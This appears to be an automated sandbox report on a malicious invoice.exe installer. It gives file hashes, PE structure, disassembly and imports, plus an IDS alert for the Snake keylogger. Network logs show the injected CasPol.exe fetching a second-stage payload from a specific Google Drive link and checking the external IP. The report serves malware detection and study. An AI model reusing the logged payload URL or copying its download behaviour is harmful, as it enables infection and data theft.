                                          Preview:regf........5.#.^................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm..c..X...............................................................................................................................................................................................................................................................................................................................................l..HvLE....................3.aS.l....)!..z..........................`............... ...@..hbin................5.#.^...........nk,....S...............................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk ...X..X......(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...................................Z.......................Root........lh..(.....A.
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                          File Type:ASCII text, with CRLF, LF line terminators
                                          Category:dropped
                                          Size (bytes):164
                                          Entropy (8bit):4.5750027080925975
                                          Encrypted:false
                                          SSDEEP:3:WNEDkFrA7fw3eqIusdHSdX7/fWmEdIOAlwV6EwqQLWFBaaafFa/Rv/naaaaqBcn:WsTbtyxkKO+dZWF7afFoRHRaaqBc
                                          MD5:8D14AB4128F9BFE3E4F5F9B160BBFFE7
                                          SHA1:7EA846DF04D4120A819DB47723C716BF2610E5CD
                                          SHA-256:91D7EA682DB129FD33DA04168DB3BFCA08EA8B6CB0533C559E0ADC0DA5BD56E8
                                          SHA-512:BF72FC0F59202B09E92961CE6C6CF21D3BBBB22AAA6B0A6B3FFBA2392362BF30A6B874A6CBBF6D11F06975CDDDBDB247053222D34D4F24055E50C0AFC9802E65
                                          Malicious:false
                                          Preview:.Unhandled Exception: System.Runtime.InteropServices.SEHException: External component has thrown an exception... at ????_.?;???.?????().. at ?????.?@???.Main().
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.953363965326294
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:invoice.exe
                                          File size:861416
                                          MD5:f111934675c34cca18d9d76fc34a2e40
                                          SHA1:6c54e0fbae03df56fee84195f3deb4d2ebd8d8c1
                                          SHA256:c627b8bb6c4ea0cf03aa2d209d0ecc53ff9784283328dabd44c1675aef0939c2
                                          SHA512:48b825550b320ebfcccc4260e359ffedad7675913ee7e7a62bd62a3839fd20c8f7cafb9a6e6bb8d7d8a2164674019b696c8851362c0a6b69f4dde8b1da3dc84c
                                          SSDEEP:12288:cJAEzBf4FZZmubGJ6vVZgj9Zp4RVkdXALai8ZpP7MxhGmeLJfRriFm4gCb5vr:cJBf4guba6voj9mOdXALN8bP7MxhVP5
                                          TLSH:090523919D24D01ACFCB1A32C6E0AAF51FA93D1DF546350FAB103DDE7AB3016992E1D8
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...2.uY.................d...|.....
                                          Icon Hash:185d7c3f1d094720
                                          Entrypoint:0x4031f1
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x59759532 [Mon Jul 24 06:35:30 2017 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:3abe302b6d9a1256e6a915429af4ffd2
                                          Signature Valid:false
                                          Signature Issuer:E=Levnendes@Printstnings.Gum, OU="Berlinsk Absorptively Uncatholicise ", O=Toffy, L=Parbrook, S=England, C=GB
                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                          Error Number:-2146762487
                                          Not Before, Not After
                                          • 04/05/2022 00:03:57 03/05/2025 00:03:57
                                          Subject Chain
                                          • E=Levnendes@Printstnings.Gum, OU="Berlinsk Absorptively Uncatholicise ", O=Toffy, L=Parbrook, S=England, C=GB
                                          Version:3
                                          Thumbprint MD5:56C9BA7DFEC92471D18B65DEBADFD264
                                          Thumbprint SHA-1:791103B8F445F30749CC09454489D8932043151F
                                          Thumbprint SHA-256:12660D9C667AA56EF5F4D3C7A46C00BBF32786E1EDB7C6D1BB2EFDC10DDE5337
                                          Serial:292387F23D7D31A4C4A61C828EB508755809B6A4
                                          Instruction
                                          sub esp, 00000184h
                                          push ebx
                                          push esi
                                          push edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+18h], ebx
                                          mov dword ptr [esp+10h], 0040A198h
                                          mov dword ptr [esp+20h], ebx
                                          mov byte ptr [esp+14h], 00000020h
                                          call dword ptr [004080A0h]
                                          call dword ptr [0040809Ch]
                                          and eax, BFFFFFFFh
                                          cmp ax, 00000006h
                                          mov dword ptr [0042F40Ch], eax
                                          je 00007FEA50837CA3h
                                          push ebx
                                          call 00007FEA5083AD5Ah
                                          cmp eax, ebx
                                          je 00007FEA50837C99h
                                          push 00000C00h
                                          call eax
                                          mov esi, 00408298h
                                          push esi
                                          call 00007FEA5083ACD6h
                                          push esi
                                          call dword ptr [00408098h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], bl
                                          jne 00007FEA50837C7Dh
                                          push 0000000Ah
                                          call 00007FEA5083AD2Eh
                                          push 00000008h
                                          call 00007FEA5083AD27h
                                          push 00000006h
                                          mov dword ptr [0042F404h], eax
                                          call 00007FEA5083AD1Bh
                                          cmp eax, ebx
                                          je 00007FEA50837CA1h
                                          push 0000001Eh
                                          call eax
                                          test eax, eax
                                          je 00007FEA50837C99h
                                          or byte ptr [0042F40Fh], 00000040h
                                          push ebp
                                          call dword ptr [00408044h]
                                          push ebx
                                          call dword ptr [00408288h]
                                          mov dword ptr [0042F4D8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 00429830h
                                          call dword ptr [00408178h]
                                          push 0040A188h
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804
                                          Name | Virtual Address | Virtual Size | Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8534 | 0xa0 | .rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x41000 | 0x219c8 | .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd02c0 | 0x2228 |
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x298 | .rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                          .text | 0x1000 | 0x6254 | 0x6400 | False | 0.6676171875 | data | 6.4338643172916266 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata | 0x8000 | 0x1354 | 0x1400 | False | 0.4599609375 | data | 5.236269898436511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data | 0xa000 | 0x25518 | 0x600 | False | 0.4557291666666667 | data | 4.044625496015545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata | 0x30000 | 0x11000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc | 0x41000 | 0x219c8 | 0x21a00 | False | 0.8901312732342007 | data | 7.609648735329348 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          Name | RVA | Size | Type | Language | Country
                                          RT_ICON | 0x41418 | 0x1224f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                                          RT_ICON | 0x53668 | 0x6259 | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States
                                          RT_ICON | 0x598c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
                                          RT_ICON | 0x5be70 | 0x2466 | PNG image data, 256 x 256, 4-bit colormap, non-interlaced | English | United States
                                          RT_ICON | 0x5e2d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
                                          RT_ICON | 0x5f380 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304 | English | United States
                                          RT_ICON | 0x60228 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024 | English | United States
                                          RT_ICON | 0x60ad0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
                                          RT_ICON | 0x61138 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256 | English | United States
                                          RT_ICON | 0x616a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
                                          RT_ICON | 0x61b08 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
                                          RT_ICON | 0x61df0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
                                          RT_DIALOG | 0x61f18 | 0x120 | data | English | United States
                                          RT_DIALOG | 0x62038 | 0x11c | data | English | United States
                                          RT_DIALOG | 0x62158 | 0xc4 | data | English | United States
                                          RT_DIALOG | 0x62220 | 0x60 | data | English | United States
                                          RT_GROUP_ICON | 0x62280 | 0xae | data | English | United States
                                          RT_VERSION | 0x62330 | 0x354 | data | English | United States
                                          RT_MANIFEST | 0x62688 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
                                          DLL | Import
                                          KERNEL32.dll | GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                          USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                          GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                          ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                          COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                          ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                          Language of compilation system | Country where language is spoken | Map
                                          English | United States |
                                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                          03/17/23-14:34:28.679795 | TCP | 2039190 | ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check | 49842 | 80 | 192.168.11.20 | 193.122.130.0
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Mar 17, 2023 14:34:25.800806999 CET | 53317 | 53 | 192.168.11.20 | 1.1.1.1
                                          Mar 17, 2023 14:34:25.810267925 CET | 53 | 53317 | 1.1.1.1 | 192.168.11.20
                                          Mar 17, 2023 14:34:26.492222071 CET | 64485 | 53 | 192.168.11.20 | 1.1.1.1
                                          Mar 17, 2023 14:34:26.525289059 CET | 53 | 64485 | 1.1.1.1 | 192.168.11.20
                                          Mar 17, 2023 14:34:28.565037012 CET | 53811 | 53 | 192.168.11.20 | 1.1.1.1
                                          Mar 17, 2023 14:34:28.573910952 CET | 53 | 53811 | 1.1.1.1 | 192.168.11.20
                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                          Mar 17, 2023 14:34:25.800806999 CET | 192.168.11.20 | 1.1.1.1 | 0x9c31 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                                          Mar 17, 2023 14:34:26.492222071 CET | 192.168.11.20 | 1.1.1.1 | 0xb9a5 | Standard query (0) | doc-0k-a8-docs.googleusercontent.com | A (IP address) | IN (0x0001) | false
                                          Mar 17, 2023 14:34:28.565037012 CET | 192.168.11.20 | 1.1.1.1 | 0x9827 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                          Mar 17, 2023 14:34:25.810267925 CET | 1.1.1.1 | 192.168.11.20 | 0x9c31 | No error (0) | drive.google.com |  | 142.250.184.206 | A (IP address) | IN (0x0001) | false
                                          Mar 17, 2023 14:34:26.525289059 CET | 1.1.1.1 | 192.168.11.20 | 0xb9a5 | No error (0) | doc-0k-a8-docs.googleusercontent.com | googlehosted.l.googleusercontent.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                          Mar 17, 2023 14:34:26.525289059 CET | 1.1.1.1 | 192.168.11.20 | 0xb9a5 | No error (0) | googlehosted.l.googleusercontent.com |  | 142.250.186.33 | A (IP address) | IN (0x0001) | false
                                          Mar 17, 2023 14:34:28.573910952 CET | 1.1.1.1 | 192.168.11.20 | 0x9827 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                          Mar 17, 2023 14:34:28.573910952 CET | 1.1.1.1 | 192.168.11.20 | 0x9827 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
                                          Mar 17, 2023 14:34:28.573910952 CET | 1.1.1.1 | 192.168.11.20 | 0x9827 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
                                          Mar 17, 2023 14:34:28.573910952 CET | 1.1.1.1 | 192.168.11.20 | 0x9827 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
                                          Mar 17, 2023 14:34:28.573910952 CET | 1.1.1.1 | 192.168.11.20 | 0x9827 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
                                          Mar 17, 2023 14:34:28.573910952 CET | 1.1.1.1 | 192.168.11.20 | 0x9827 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
                                          • drive.google.com
                                          • doc-0k-a8-docs.googleusercontent.com
                                          • checkip.dyndns.org
                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          0 | 192.168.11.20 | 49840 | 142.250.184.206 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                          Timestamp | kBytes transferred | Direction | Data


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          1 | 192.168.11.20 | 49841 | 142.250.186.33 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                          Timestamp | kBytes transferred | Direction | Data


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          2 | 192.168.11.20 | 49842 | 193.122.130.0 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Mar 17, 2023 14:34:28.679795027 CET | 370 | OUT | GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                          Mar 17, 2023 14:34:28.781480074 CET | 370 | IN | HTTP/1.1 200 OK
                                          Date: Fri, 17 Mar 2023 13:34:28 GMT
                                          Content-Type: text/html
                                          Content-Length: 103
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 33 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.35</body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          0 | 192.168.11.20 | 49840 | 142.250.184.206 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          2023-03-17 13:34:25 UTC | 0 | OUT | GET /uc?export=download&id=1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                          Host: drive.google.com
                                          Cache-Control: no-cache
                                          2023-03-17 13:34:26 UTC | 0 | IN | HTTP/1.1 303 See Other
                                          Content-Type: application/binary
                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                          Pragma: no-cache
                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                          Date: Fri, 17 Mar 2023 13:34:26 GMT
                                          Location: https://doc-0k-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/s4sbn26f0am6hqllsu7edmokcls88pe1/1679060025000/12467729248612761337/*/1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S?e=download&uuid=a6a0f6a4-7f4f-44fa-b2c7-5636188002aa
                                          Strict-Transport-Security: max-age=31536000
                                          Content-Security-Policy: script-src 'nonce-WMUwB9LCnaOOmtFxwD_pPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                          Cross-Origin-Opener-Policy: same-origin
                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                          Server: ESF
                                          Content-Length: 0
                                          X-XSS-Protection: 0
                                          X-Frame-Options: SAMEORIGIN
                                          X-Content-Type-Options: nosniff
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          Connection: close


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          1 | 192.168.11.20 | 49841 | 142.250.186.33 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          2023-03-17 13:34:27 UTC | 1 | OUT | GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/s4sbn26f0am6hqllsu7edmokcls88pe1/1679060025000/12467729248612761337/*/1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S?e=download&uuid=a6a0f6a4-7f4f-44fa-b2c7-5636188002aa HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                          Cache-Control: no-cache
                                          Host: doc-0k-a8-docs.googleusercontent.com
                                          Connection: Keep-Alive
                                          2023-03-17 13:34:27 UTC | 1 | IN | HTTP/1.1 200 OK
                                          X-GUploader-UploadID: ADPycdsXS4acQvg1knzen0LJ8wHp6PWGPe6pthuqpkqcKjFceoseRdIltwCVu6RhNS5rdqSh1RsYT1k9_RbeJ0lGhAijhniPPcDT
                                          Content-Type: application/octet-stream
                                          Content-Disposition: attachment; filename="QKUNUNhd48.bin"; filename*=UTF-8''QKUNUNhd48.bin
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Credentials: false
                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, 
X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token
                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                          Content-Length: 130624
                                          Date: Fri, 17 Mar 2023 13:34:27 GMT
                                          Expires: Fri, 17 Mar 2023 13:34:27 GMT
                                          Cache-Control: private, max-age=0
                                          X-Goog-Hash: crc32c=0Y7VEA==
                                          Server: UploadServer
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          Connection: close
                                          2023-03-17 13:34:27 UTC45INData Raw: 80 d0 21 25 3b 8d 08 72 7d 31 92 a0 e8 d9 61 fc b8 8b cd e6 80 90 ce 61 7e 4a 06 de 16 3c fc 0c 62 83 9e 1d c4 39 7f 3b a2 90 0d 52 3d 8b d1 7e bc bc 34 92 ef 13 59 7f 8c af c3 8f e9 56 bc 4c e7 19 2f ca 0d 1c f9 fe 12 27 70 bf dd 64 b6 9c 07 48 8b 16 32 99 96 41 d9 e1 f2 1e 50 25 b7 74 1d c0 50 9c 16 c6 fa 13 97 37 15 d5 e5 05 19 a2 9c fe b3 0a 76 9e f7 cf e5 44 b5 8a c0 3a 30 b3 82 5f d7 b2 d2 70 62 a7 db 33 c4 49 1b 03 da 23 77 97 e3 ae ea 3e ff 44 24 e1 f1 60 22 77 4c df 79 4b a6 0d 7e 5d 64 e2 26 3b f3 3e d2 73 95 09 38 59 4c c7 11 95 09 83 d3 7c b8 4a fa 57 61 e9 b1 e2 06 ac f7 6f 30 fc 8a 8b 67 ba 13 ba ba 8a 5b 62 87 ca 70 a0 78 23 44 7a f0 5e 37 0f 2f 2a d8 5c 11 e7 bc de 2a 66 a1 ca bc 84 24 38 7d 9e d5 c9 07 fc 2b 65 f3 9b c0 e2 60 08 6e ec c8
                                          Data Ascii: !%;r}1aa~J<b9;R=~4YVL/'pdH2AP%tP7vD:0_pb3I#w>D$`"wLyK~]d&;>s8YL|JWao0g[bpx#Dz^7/*\*f$8}+e`n
